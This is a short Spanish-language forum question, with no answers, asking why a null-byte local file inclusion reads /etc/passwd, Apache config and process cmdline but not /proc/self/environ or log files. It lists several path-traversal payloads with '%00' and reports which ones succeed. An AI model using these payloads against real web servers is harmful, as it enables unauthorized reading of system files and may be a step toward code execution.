Por qué / proc / self / environ sin salida a través de inyección

0

¿Qué en una máquina impediría que una inyección de byte nulo muestre la salida de /proc/self/environ y /proc/$PID/environ o /proc/$PID/fd/12 ?

De acuerdo con este artículo, todas las carpetas bajo /proc deben tener los permisos para el usuario que ejecuta el servicio ... por lo tanto, la inyección utilizando un byte nulo ocurre bajo el usuario www-data ¿correcto?

Resultados visibles en:

../../../../../../etc/passwd%00    {output passwd file}
../../../../../../etc/httpd/conf/httpd.conf%00  {output apache config}
../../../../../../etc/httpd/run/httpd.pid%00   {PID of httpd process}
../../../../../../proc/$PID/cmdline%00  {cmd line executed to run httpd}
../../../../../../etc/ssh/ssh_config%00  {ssh config file}

No obteniendo resultados de:

../../../../../../var/log/messages%00
../../../../../../var/log/secure%00
../../../../../../proc/self/environ%00
../../../../../../proc/$PID/environ%00

Cualquier consejo sería genial.

    
pregunta Dusty Boshoff 28.04.2016 - 13:59
fuente

0 respuestas

Lea otras preguntas en las etiquetas